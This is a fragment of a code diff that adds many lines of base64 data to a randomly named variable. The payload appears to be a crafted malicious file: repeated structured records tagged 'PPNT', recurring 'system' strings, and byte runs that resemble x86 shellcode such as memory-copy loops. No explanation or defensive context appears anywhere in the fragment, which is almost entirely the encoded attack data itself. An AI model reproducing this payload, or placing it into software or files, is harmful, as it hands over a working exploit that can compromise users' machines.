+    englishmansdentist+="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//////" + "\r\n"
+    englishmansdentist+="/////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///1RDSVAE" + "\r\n"
+    englishmansdentist+="AAAAAQAAAP////8IAAAAAAAAAAAAAAC5AwAACfEAAAuwAAAAAABkAGQRAQMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE3haxHRNliGGAbvzqJx6xZojYiJkVM4iYJ3cScHOycUA2Fdy8BK" + "\r\n"
+    englishmansdentist+="f+17p+iHAZwsjA2xtPB1qijTh10mC7vH+4tKiK4sgr362avA2iM/hfruFRbWX54m" + "\r\n"
+    englishmansdentist+="wr6i+7ZNfrgV94VhRcWHfP//AQH9HGBt2fuL3MGPFvLGXelYUZ57u6P6FRHlf2v2" + "\r\n"
+    englishmansdentist+="frsbbId0AcayOyM0NowIxlaEGX8S9g4HSPf4yUaA7yTIXs4Ycxszi9P3M0uJx/Ok" + "\r\n"
+    englishmansdentist+="i99mgcr/D0JSagJYzS48BVp077h3MDB0i/qvdeqvdeeL94v7M8lmuQIE86SQKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWVrEdE2WIYYBu/OonHrFmiNiImRUziJgndxJwc7" + "\r\n"
+    englishmansdentist+="JxQDYV3LwEp/7Xun6IcBnCyMDbG08HWqKNOHXSYLu8f7i0qIriyCvfrZq8DaIz+F" + "\r\n"
+    englishmansdentist+="+u4VFtZfnibCWKL7tk1+uBX3hWFFxYd8/ygAAAAAACgAAAAAqMghK1ndw0IWilQV" + "\r\n"
+    englishmansdentist+="Jaemqk+V1U13ECGHnrFTlLItWEUdUibRVdm0p5b+Dszj9Tu7flQhdvw//ogbt8Ph" + "\r\n"
+    englishmansdentist+="hb24QK+V29Lt73cu6FMQ6at1fDFS0yR9tWsq3POijgNFbBhCE2iVWW0EEVhtZMRd" + "\r\n"
+    englishmansdentist+="bR33Wm1olVltzMzMzIiIzMzMEMzMQMzMzIv486SLP15taJVZbe7M5YVsUrMoMczM" + "\r\n"
+    englishmansdentist+="zHE7WW38lttxHfdabSgAAAAAm8ghK1ndw0IWilQVJaemqk+V1U13ECGHnrFTlLIt" + "\r\n"
+    englishmansdentist+="WEUdUibRVdm0p5b+Dszj9Tu7flQhdvw//ogbt8Phhb24QK+V29Lt73cu6FMQ6at1" + "\r\n"
+    englishmansdentist+="fDFS0yR9tWsq3POijgNFbBhCE2iVWW0EEVhtZMRdbR33Wm1olVltzMzMzIiIzMzM" + "\r\n"
+    englishmansdentist+="EMzMQMzMzIv486SLP15taJVZbe7M5YVsUrMoMczMKAAAAACayCErWd3DQhaKVBUl" + "\r\n"
+    englishmansdentist+="p6aqT5XVTXcQIYeesVOUsi1YRR1SJtFV2bSnlv4OzOP1O7t+VCF2/D/+iBu3w+GF" + "\r\n"
+    englishmansdentist+="vbhAr5Xb0u3vdy7oUxDpq3V8MVLTJH21ayrc86KOA0VsGEITaJVZbQQRWG1kxF1t" + "\r\n"
+    englishmansdentist+="HfdabWiVWW3MzMzMiIjMzMwQzMxAzMzMi/jzpIs/Xm1olVlt7szlhWxSsygxzCgA" + "\r\n"
+    englishmansdentist+="AAAAmcghK1ndw0IWilQVJaemqk+V1U13ECGHnrFTlLItWEUdUibRVdm0p5b+Dszj" + "\r\n"
+    englishmansdentist+="9Tu7flQhdvw//ogbt8Phhb24QK+V29Lt73cu6FMQ6at1fDFS0yR9tWsq3POijgNF" + "\r\n"
+    englishmansdentist+="bBhCE2iVWW0EEVhtZMRdbR33Wm1olVltzMzMzIiIzMzMEMzMQMzMzIv486SLP15t" + "\r\n"
+    englishmansdentist+="aJVZbe7M5YVsUrMoMSgAAAAAg8ghK1ndw0IWilQVJaemqk+V1U13ECGHnrFTlLIt" + "\r\n"
+    englishmansdentist+="WEUdUibRVdm0p5b+Dszj9Tu7flQhdvw//ogbt8Phhb24QK+V29Lt73cu6FMQ6at1" + "\r\n"
+    englishmansdentist+="fDFS0yR9tWsq3POijgNFbBhCE2iVWW0EEVhtZMRdbR33Wm1olVltzMzMzIiIzMzM" + "\r\n"
+    englishmansdentist+="EMzMQMzMKAAAAACCyCErWd3DQhaKVBUlp6aqT5XVTXcQIYeesVOUsi1YRR1SJtFV" + "\r\n"
+    englishmansdentist+="2bSnlv4OzOP1O7t+VCF2/D/+iBu3w+GFvbhAr5Xb0u3vdy7oUxDpq3V8MVLTJH21" + "\r\n"
+    englishmansdentist+="ayrc86KOA0VsGEITaJVZbQQRWG1kxF1tHfdabWiVWW3MzMzMiIjMzMwQzMxAzCgA" + "\r\n"
+    englishmansdentist+="AAAAgcghK1ndw0IWilQVJaemqk+V1U13ECGHnrFTlLItWEUdUibRVdm0p5b+Dszj" + "\r\n"
+    englishmansdentist+="9Tu7flQhdvw//ogbt8Phhb24QK+V29Lt73cu6FMQ6at1fDFS0yR9tWsq3POijgNF" + "\r\n"
+    englishmansdentist+="bBhCE2iVWW0EEVhtZMRdbR33Wm1olVltzMzMzIiIzMzMEMzMQCgAAAAAf8ghK1nd" + "\r\n"
+    englishmansdentist+="w0IWilQVJaemqk+V1U13ECGHnrFTlLItWEUdUibRVdm0p5b+Dszj9Tu7flQhdvw/" + "\r\n"
+    englishmansdentist+="/ogbt8Phhb24QK+V29Lt73cu6FMQ6at1fDFS0yR9tWsq3POijgNFbBhCE2iVWW0E" + "\r\n"
+    englishmansdentist+="EVhtZMRdbR33Wm1olVltzMzMzIiIzMzMEMwoAAAAAH7IIStZ3cNCFopUFSWnpqpP" + "\r\n"
+    englishmansdentist+="ldVNdxAhh56xU5SyLVhFHVIm0VXZtKeW/g7M4/U7u35UIXb8P/6IG7fD4YW9uECv" + "\r\n"
+    englishmansdentist+="ldvS7e93LuhTEOmrdXwxUtMkfbVrKtzzoo4DRWwYQhNolVltBBFYbWTEXW0d91pt" + "\r\n"
+    englishmansdentist+="aJVZbczMzMyIiMzMzBAoAAAAAHzIIStZ3cNCFopUFSWnpqpPldVNdxAhh56xU5Sy" + "\r\n"
+    englishmansdentist+="LVhFHVIm0VXZtKeW/g7M4/U7u35UIXb8P/6IG7fD4YW9uECvldvS7e93LuhTEOmr" + "\r\n"
+    englishmansdentist+="dXwxUtMkfbVrKtzzoo4DRWwYQhNolVltBBFYbWTEXW0d91ptaJVZbczMzMyIiMzM" + "\r\n"
+    englishmansdentist+="KAAAAAB7yCErWd3DQhaKVBUlp6aqT5XVTXcQIYeesVOUsi1YRR1SJtFV2bSnlv4O" + "\r\n"
+    englishmansdentist+="zOP1O7t+VCF2/D/+iBu3w+GFvbhAr5Xb0u3vdy7oUxDpq3V8MVLTJH21ayrc86KO" + "\r\n"
+    englishmansdentist+="A0VsGEITaJVZbQQRWG1kxF1tHfdabWiVWW3MzMzMiIjMKAAAAAB6yCErWd3DQhaK" + "\r\n"
+    englishmansdentist+="VBUlp6aqT5XVTXcQIYeesVOUsi1YRR1SJtFV2bSnlv4OzOP1O7t+VCF2/D/+iBu3" + "\r\n"
+    englishmansdentist+="w+GFvbhAr5Xb0u3vdy7oUxDpq3V8MVLTJH21ayrc86KOA0VsGEITaJVZbQQRWG1k" + "\r\n"
+    englishmansdentist+="xF1tHfdabWiVWW3MzMzMiIgoAAAAAHfIIStZ3cNCFopUFSWnpqpPldVNdxAhh56x" + "\r\n"
+    englishmansdentist+="U5SyLVhFHVIm0VXZtKeW/g7M4/U7u35UIXb8P/6IG7fD4YW9uECvldvS7e93LuhT" + "\r\n"
+    englishmansdentist+="EOmrdXwxUtMkfbVrKtzzoo4DRWwYQhNolVltBBFYbWTEXW0d91ptaJVZbczMzCgA" + "\r\n"
+    englishmansdentist+="AAAAdsghK1ndw0IWilQVJaemqk+V1U13ECGHnrFTlLItWEUdUibRVdm0p5b+Dszj" + "\r\n"
+    englishmansdentist+="9Tu7flQhdvw//ogbt8Phhb24QK+V29Lt73cu6FMQ6at1fDFS0yR9tWsq3POijgNF" + "\r\n"
+    englishmansdentist+="bBhCE2iVWW0EEVhtZMRdbR33Wm1olVltzMwoAAAAAHXIIStZ3cNCFopUFSWnpqpP" + "\r\n"
+    englishmansdentist+="ldVNdxAhh56xU5SyLVhFHVIm0VXZtKeW/g7M4/U7u35UIXb8P/6IG7fD4YW9uECv" + "\r\n"
+    englishmansdentist+="ldvS7e93LuhTEOmrdXwxUtMkfbVrKtzzoo4DRWwYQhNolVltBBFYbWTEXW0d91pt" + "\r\n"
+    englishmansdentist+="aJVZbcwoAAAAAHTIIStZ3cNCFopUFSWnpqpPldVNdxAhh56xU5SyLVhFHVIm0VXZ" + "\r\n"
+    englishmansdentist+="tKeW/g7M4/U7u35UIXb8P/6IG7fD4YW9uECvldvS7e93LuhTEOmrdXwxUtMkfbVr" + "\r\n"
+    englishmansdentist+="Ktzzoo4DRWwYQhNolVltBBFYbWTEXW0d91ptaJVZbQMVAKEAZAEAUFBOVAARAE1k" + "\r\n"
+    englishmansdentist+="KqgO4dairXoaKqtGJOfathwbviEk01g+FrqVQC8wckkoPtUjqTs5VsOSBi5nf+ny" + "\r\n"
+    englishmansdentist+="U03T963UBZmOwuPU0X/ou2wjVlCEYiLotdHK855vUgww0zceuQ+31XNXIuI+y11D" + "\r\n"
+    englishmansdentist+="X16wOigAAAAAAAMVAKEAZAEAUFBOVAARAE1IKwzWOSCWPCV85rZc6Tt/Bic0kdxJ" + "\r\n"
+    englishmansdentist+="KnwYsZGmkwwH9QGKriYW25N5idOoJP1oGCxx7oUVYD7sEmKczAM0Li8WBLlOSg9t" + "\r\n"
+    englishmansdentist+="gZU5KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVqd0dY" + "\r\n"
+    englishmansdentist+="NHdIUlBRUEtqN0tqMFVqNTRuNEdQYTRLMEQ5VmtEOVptMEQxMkFLdUdadDdyU1Nt" + "\r\n"
+    englishmansdentist+="WkVSQWhsVEZTTkd6WlhNYm1rdE5XMm5WT2dHNlE3cHpRY1UydGNmTjRWeHl4ZTlH" + "\r\n"
+    englishmansdentist+="ASgAAAAAAAMVAKEAZAEAUFBOVAARAE1IZDlNYldXaVI5aW14dzRER3Y0RHo4Qkdm" + "\r\n"
+    englishmansdentist+="OGx2S0V5V2IyM3RlWWl6Y2FxcnRTa3lRdWxnWDlVTklaNi0Bieaa+DBUb8RDOxea" + "\r\n"
+    englishmansdentist+="KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWX08PcTTZVE" + "\r\n"
+    englishmansdentist+="HSSId3ObQFK/tjZvYMdReXdBagkt+dxSfjqlhKTKqRHgqRl6gX9BTJ0Fbtx7YMzx" + "\r\n"
+    englishmansdentist+="SvFhVjWO8fQu/dQHZTXQ5Gs/QDCItQ7bDjyXSc/20gOUU6J0SHtdYS5Rl6fGAigA" + "\r\n"
+    englishmansdentist+="AAAAAAMVAKEAZAEAUFBOVAARAE1IKv3Pv37T+WFIEzFxkT91ZcjmSZ/rcK/Rp7Sd" + "\r\n"
+    englishmansdentist+="FqRpV7oGhoKzj99kEWpo1QOKh3l0F4MFDqXB9JA7LKn/vno+unGQYfs9Yh68KAAA" + "\r\n"
+    englishmansdentist+="AAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXvxNPS8bMoUHCm" + "\r\n"
+    englishmansdentist+="iOabpiU9hmjMwPfroImROTVCISH+saIKAz7tuTlBZfS70u6kwyrRgEPFcgQowC3G" + "\r\n"
+    englishmansdentist+="U4R5BZtlC3GNnVd7oSsBXduahKeGxxD+1CeLZ9s6tYLtzF6DSWouUd7XAygAAAAA" + "\r\n"
+    englishmansdentist+="AAMVAKEAZAEAUFBOVAARAE1IUN43jC+5pEXQVQd2wjzQCA1kyvQeSN6TKp+xa88H" + "\r\n"
+    englishmansdentist+="4iddD6RlhEZSqUQ+b5rADWh1tDfkj6Zf60u0S+HdlG4+h9YFEDRseBeNKAAAAAAA" + "\r\n"
+    englishmansdentist+="LGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUtOL+19Bm0AhxTLWJl" + "\r\n"
+    englishmansdentist+="rvJTvdJ+V4WXtfMkz012B9er1q79L9ph4Z7XKVxpkH55WT4/P+Of63sSLZl7x2RI" + "\r\n"
+    englishmansdentist+="7B3STslE8miIqSQcBJZhy8SLVFF7wy1Dtg5nBgTFn8t0pRNpwxwtBCgAAAAAAAMV" + "\r\n"
+    englishmansdentist+="AKEAZAEAUFBOVAARAE1IQXixS0511LdVUgbSFCtsFoFtjmaImzF/v1jGfVzUiaMO" + "\r\n"
+    englishmansdentist+="yN3JUJuRVdBnMcyTV9mPMfUT1GDfOc4FAVuruVnOQb/zqaIk7ijMKAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWJQ9KFfPCYCmdPghx66OK8" + "\r\n"
+    englishmansdentist+="KOUMMCnvUfFsZh5eLe0Xs3eo+vc88WtseHEH3vFujK+lawXu1RDAZwXOCSljir4n" + "\r\n"
+    englishmansdentist+="o+BwjLpVp0q0VFgZqmvBW4PCkPHZ5Jo78eqAKs2xya6GxKQkBSgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1IrafNDc+IursBMTPC9fZt9me1wy4aDgZKJvY4fOxZz+wnJjJi" + "\r\n"
+    englishmansdentist+="EAEkf3dHgzG8Fy2t3ICIXIHWcEFPOE2X1IxeVgrYFQuqOzQvKAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWCT/hpjX1FeGERZnCAK/8l952g" + "\r\n"
+    englishmansdentist+="aT0FaV4KS0LJtuOxDrTeF6VR/RUBVjTa2p9ZYXDhrweEBMvwdKcC4g4wibgQh7kI" + "\r\n"
+    englishmansdentist+="eIgLAemIT+Ka+LXJmy0sOvyZWPox3ornu/qVxST4BrPdBigAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1IuTOl7XnSU3l37v6UfHjYLyHDpYtBDiIM0CItXoFoacOXe+tWIrPI" + "\r\n"
+    englishmansdentist+="bBT16iVOiAe3qBCh/kkT8PiAGZP5SPvY16JSXzwGuZCOKAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVtTavxi9CfDhvAK8cDT63ro6ZFESTC" + "\r\n"
+    englishmansdentist+="fxWSvwRNZCc0tR5u+v2sb9CDR7iKErp1gggHIIRwBI+i3NsRL8OAAthY3jLmqglp" + "\r\n"
+    englishmansdentist+="jd7U6iiXjDiZdAgWfey0I+T4kUrnDBHG+mCoFOE5BygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1Ib+P6qIgJYFukttXeQEiA/GC0HmL9VX83OmGs61lJ+hty3vfCtzDxfCgW" + "\r\n"
+    englishmansdentist+="gPh7L4CzuoRkvUf8BgGRRjZtCHOJFVLaRHpVurxRKAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWUlG51pUdEmvZGWV0NdHeCfrT0q3pzM4mli" + "\r\n"
+    englishmansdentist+="LswbKb0hp0JDu2KP0I3Es0JDK2mjIVPPx61ckOcbERWdkVmoUQ0GkUeb49+Sipmo" + "\r\n"
+    englishmansdentist+="PCWFXVftRayThgb0kB8fkUrnDBHG+mCoFOE5CCgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1Io/QM3TUHpmdAxzLXJWbh+40NGm0j+uvw73jhgvokhI8WmEamhKs9O2lMOIN+" + "\r\n"
+    englishmansdentist+="V9dpP1r6VPGVQ72XPPaXWEolNXLoG9AztSp+KAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWXg5ehsbZLEcpdTHcFOML2iOTL7OvzAPRU3vzSb" + "\r\n"
+    englishmansdentist+="wNqLFknyaWbB72UonhNgWYn+9yeLf8kfDmt7Z/uEogxb2WombF1FBfBNV+aFRgqF" + "\r\n"
+    englishmansdentist+="qUpoEmvOoMJSJ3WpjSPh8dZ0tyI4jW+tCSgAAAAAAAMVAKEAZAEAUFBOVAARAE1I" + "\r\n"
+    englishmansdentist+="F5MnTqkdyXlQV3d72FMpajveqKHUDtfjrnhJwMV/SYf4rkdKjUu4MtB4bbwHwXUh" + "\r\n"
+    englishmansdentist+="44t7XuxCzkEGvN/+V6+WgQmXEQvYFVJsKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWUjCIB9R2L8vQ0kPDATRXYvqR8lKlMjg1lVT8UJX0KA" + "\r\n"
+    englishmansdentist+="ueJkyqQT/KPcIawiu6og650LgqfNTWikiaLbkQoeJI5pXfhUZxblr+IvMkfhR2yz" + "\r\n"
+    englishmansdentist+="RUXU4cH4mPZfUU2FFDWQOJZ8OQVFCigAAAAAAAMVAKEAZAEAUFBOVAARAE1IF/HT" + "\r\n"
+    englishmansdentist+="/fLDttScQrahHw4vJzxO4upyuJt58OabJNqasfwLiykhzIBcBohHSvoDKNxkG7Ey" + "\r\n"
+    englishmansdentist+="BblAs9bAFTy+t54ZnROXLwnJig03KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWUVpiZiAikXLMhyG0yFCJsMQ4UO1PjQ3HltiNA7lA6Ham0W" + "\r\n"
+    englishmansdentist+="b6jYH/ZzncI5LNpCBEE5M2OlML+ILYtZXQSOPnPv59Gycu0he3scZJPTZiWF6ome" + "\r\n"
+    englishmansdentist+="/TSUCpKaAYyOebRVXV4Hnt8lCygAAAAAAAMVAKEAZAEAUFBOVAARAE1IS0mRyuad" + "\r\n"
+    englishmansdentist+="lD2A8KXBTNAGRQZLVfCIL4h2sJW7j2zIVO2hvAM10zsUKCTrysi6VQhyCi8XognO" + "\r\n"
+    englishmansdentist+="zqHSTuus6iLQxFCri8zZk04eKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWX2ZUhJNUr7FNJnAWmMh1ZnGs02I3ULhGlaTMryGYbnb0myWNJI" + "\r\n"
+    englishmansdentist+="TUFMN6omS0n7dfkkc8SoLmL9YGfWR1PYee01DTgdQ6WHnga0vYaTnFfuWzmgsDlX" + "\r\n"
+    englishmansdentist+="mDz4z5Nz2I5b1lHfWKC3DCgAAAAAAAMVAKEAZAEAUFBOVAARAE1IKqlE83ZpA9UI" + "\r\n"
+    englishmansdentist+="Te1MTcD3HmSinU2Nzqa9zZ9+aQ2G1J7T6MSTSX1q7ToS/lr6SIDg5vrwOEPhHoJa" + "\r\n"
+    englishmansdentist+="SCnxeTaTpc8JJySk0m4CKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWULbh7ZgLAXW6CjaGE9JQbsGdiFI8Lon8lxUcqyqU2seG6nrOnKf3Kp" + "\r\n"
+    englishmansdentist+="eC+eOG79aw8eYqb7IiejTDORgxEe0qgKkJVxbmg+MTJ8qpbxc91IQKF4DEV9ezC0" + "\r\n"
+    englishmansdentist+="tSKG13RYzq68jKASDSgAAAAAAAMVAKEAZAEAUFBOVAARAE1IlIDYoOC3u5KQN3sd" + "\r\n"
+    englishmansdentist+="AzyZkWKBvNXF5HRuwdRyr2V1z00x4tfrCHnf2q2IzpHIUZs6Btexy1RAUPzFSc6T" + "\r\n"
+    englishmansdentist+="KLICWcQHhFN1mkNdKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWVhVO/KqObGW0kkVPV7JYx46MAKMMc+nj2FmBtb2FGAbOYseEJ2szzirRnZ" + "\r\n"
+    englishmansdentist+="AYAMAZY7TDCgNI56w0pLwtEJWKgtJKHltjX2fIBiaVjYy/Tq33EENEt/pMqFlNmK" + "\r\n"
+    englishmansdentist+="zQT0LoGfVKYvDigAAAAAAAMVAKEAZAEAUFBOVAARAE1IDXR1qz7X1bzuaPCc7Arw" + "\r\n"
+    englishmansdentist+="2OcOM9mPCmir7/PpGo7mA/1OfX6luio7Lql3Jd+4hy4+z9q66wukORMdqCJuzAo4" + "\r\n"
+    englishmansdentist+="uXHkUXgDMVnyKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEA" + "\r\n"
+    englishmansdentist+="TWXXt/mEfquSt8Wm0aOAfcHrAe59vN9xZEMYDRbz38LpIodNUS6YtLbIfZFVtxNv" + "\r\n"
+    englishmansdentist+="tHM5LBIM8dqQvgnYVq7IvJIT6d1yRQjfFT3TSoOki12jJY1NXCnWC6ueNbYMDtsM" + "\r\n"
+    englishmansdentist+="12Vdmw38DygAAAAAAAMVAKEAZAEAUFBOVAARAE1IcXkUKMz9B65cNA/D7cM8qwvP" + "\r\n"
+    englishmansdentist+="jZ22oJA33pkyB148NFMlzvnllWvr45zlXGJsj/rzrvz2tcwSqR4/YPQmnANsCRw8" + "\r\n"
+    englishmansdentist+="ARyF0LIYKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUR" + "\r\n"
+    englishmansdentist+="cNdSTjFTKY9yjzPeEIR3EVxnPue0l6bzJEGzE/o55x7UuTXxuVg3IxXpoYArtcYS" + "\r\n"
+    englishmansdentist+="mrITPKUKhPbqweHkP8e62iAi6+y4kdd/zXvbaXs9Vagm5qm5q3S3EwdsIslvD7n9" + "\r\n"
+    englishmansdentist+="YROoECgAAAAAAAMVAKEAZAEAUFBOVAARAE1I8k3ph22ZowR5mXsy4hf9WK0o+yjd" + "\r\n"
+    englishmansdentist+="7hQ5tfUp2eu2e97hG7GQV26rfLawQTh1idy0igEme5kkeDHDuZfarEQyTcFNp/xQ" + "\r\n"
+    englishmansdentist+="V8P5KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVVbcIH" + "\r\n"
+    englishmansdentist+="vKxMpeio3ScvMjteOS5CQe028/i/meqmFFwFb64HmwfAp/1SjBl/Zyml516DS3tY" + "\r\n"
+    englishmansdentist+="ELxpMzU9CiwFmG0iPznQZzC3iS1g0Mc9wh71FDeU+DQRFSCMnfj08zEk5ZSxTNEl" + "\r\n"
+    englishmansdentist+="ESgAAAAAAAMVAKEAZAEAUFBOVAARAE1IWxp17HjV3XLaOb6nDhfgspeCiuKfHgkt" + "\r\n"
+    englishmansdentist+="Ryc/mdgQc/1EFiqXC7tSm/mfhpPvX7p4+k4MYQx8CcyozC9IqNbvfY7293R9mRkV" + "\r\n"
+    englishmansdentist+="KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVPBHiP5o10" + "\r\n"
+    englishmansdentist+="8jHO5XPXcR+VVk5YAUaD7vCJHB0XWhOS+68gqp8rQWtX3F1KzCPj3wz55ENs9Xh6" + "\r\n"
+    englishmansdentist+="cindtFZTSohBn7IZDxajXKFHXk5tMTxEfOvYXXcrpg7jDKfOV0PwJpRBiaRzEigA" + "\r\n"
+    englishmansdentist+="AAAAAAMVAKEAZAEAUFBOVAARAE1ILGpzk2E865hyc7EBJXX+XH6Cfe515lyDLEME" + "\r\n"
+    englishmansdentist+="cmdxHacazEC/xmoN3n8C73ZGEGqXrg0XAVUTN4o6/iIbiUY1z7eOvHi1ZH8XKAAA" + "\r\n"
+    englishmansdentist+="AAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUV7DaFnwjG9KXJ" + "\r\n"
+    englishmansdentist+="f1ZArR9nv2zjm8TniVf6+UrYHK34WhnAHJwhviOFc8fR63Q6wV03XR7G40Kb8RLe" + "\r\n"
+    englishmansdentist+="sceH0hgUmZKn8WmleJpQm4qO1Uqu8kEoBjZVRNmcQJwk8TVkYuzP/j+EEygAAAAA" + "\r\n"
+    englishmansdentist+="AAMVAKEAZAEAUFBOVAARAE1IujKl2p5pis30dGD8qK02TTDlmZr9EznLBP5F2xgo" + "\r\n"
+    englishmansdentist+="uhz93XQp49AkAgVYOJRkWLo3NC0Tduio8JF8Rxcj+rxTRcsxk7fTBQlKKAAAAAAA" + "\r\n"
+    englishmansdentist+="LGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXknYMciRQC5cggbQfD" + "\r\n"
+    englishmansdentist+="VbhI0uQVQyXtrVZctpz8RbdXkRj0bzleW98V/s61ZHySYL3dkWcNbH3Rc5QID7o6" + "\r\n"
+    englishmansdentist+="LZOJzBIb4UsxlkaKVtvyJV4ehCMBHJTQqzV9/LxS+NglrKjatoNPFCgAAAAAAAMV" + "\r\n"
+    englishmansdentist+="AKEAZAEAUFBOVAARAE1I4hrLxc/TvWH7SJX7yvslOHtDrybOf7MFcfH1Mr6qmAXe" + "\r\n"
+    englishmansdentist+="KY+l03UioGdfzkikTGaetp2K4uD4cneAaywtnbsnxybyWb9FZ7HsKAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXxPjtVK8OgtPiSafS34qgx" + "\r\n"
+    englishmansdentist+="o+pzaUW/6q2/mgW5feUBy08Js9d+P4iv5IdlYoH3YFeiW12AKpmGD9zJ3Pp7M4wK" + "\r\n"
+    englishmansdentist+="XWh5TWyhrBE+avX1EPuJXXAn2dVqMYWO3K6PueaWubUijjX7FSgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1IYdSOl/OtAUvbwvv5JUdJkMpwVhRAAjTsEGHQMMU3+O55z5ZX" + "\r\n"
+    englishmansdentist+="HVHNvw0beCsBOW6eu1NW0q0CR1zr7gwcoaQ8+HiKDqT01BJ5KAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVs4qU7awN3vlHXxEX6e7GNHJyC" + "\r\n"
+    englishmansdentist+="Yy+e4LvDCi4e50XnaW4DFbfzNPpsSAXOKyW7w9Xm1zo8FHoxl25aFqWAO9JEMWY/" + "\r\n"
+    englishmansdentist+="eljg8vIG6YKQTJs0Uj8RHSEdE9u8M4vGa3fLvodzAoGgFigAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1IdKjGY5ie3ce5eSDht78B0z/F+x5yujTmqaL7fKPTJ5RRs0SUtkPA" + "\r\n"
+    englishmansdentist+="Z99CEjCUZqFklYEReDUNMtMe50oy1OBdByKsnSm8+/ZSKAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVeYvGwuo2kJmW1BlAvqXo6BFHIfcI3" + "\r\n"
+    englishmansdentist+="P+s9zHCJr/sxs/DSIaC4x5KvG2Er87fGumKuHAP+z+vJhiTQw+Q+dgr8hhdV/Meu" + "\r\n"
+    englishmansdentist+="5OlLAjZ40KF76aIJ7B0KHeVdfP0ENr2vAucvMrmWFygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1Ix+DxAbKhTrcmejaogWfgBSPsZT8dJwQ/LOmFdim23vxCDAFkN9X2Wgmc" + "\r\n"
+    englishmansdentist+="RscdC6Kvdov9RPedBIUvd+Pv0r+5jGLcPNTitybIKAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWVuXPOyaFBe2wotUs0xRKVaEa9Z6LfoqGT+" + "\r\n"
+    englishmansdentist+="D7lS6+kxPPsTayKDGaIOhRHnhBB7+tnL8Ag7jGBzdJ1kdCyuldqu+CjBEbbVcZY+" + "\r\n"
+    englishmansdentist+="eTFVBjdz4Pqj+QgrzkttYaRR8K5sS+VcA/jEGCgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1IcXcojjG2hHir6e4c4zUgt5RzxMkcoBqCmKwVb7cZ9M1FfJHO/hsgbcGUtPh2" + "\r\n"
+    englishmansdentist+="H1MB8gzeykQ2hP5DFC6eUuSCAfPo5QX2BzL+KAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWUwvG6wQ9xa1pzcAX72QS3WqO37kBXnW3xlSLua" + "\r\n"
+    englishmansdentist+="C9vDPAZwMEaM+dl+CLz6tQKtmL3uEEUrjrIZpKOtGcrTDNB5f0R7gDcGaIPaAwYN" + "\r\n"
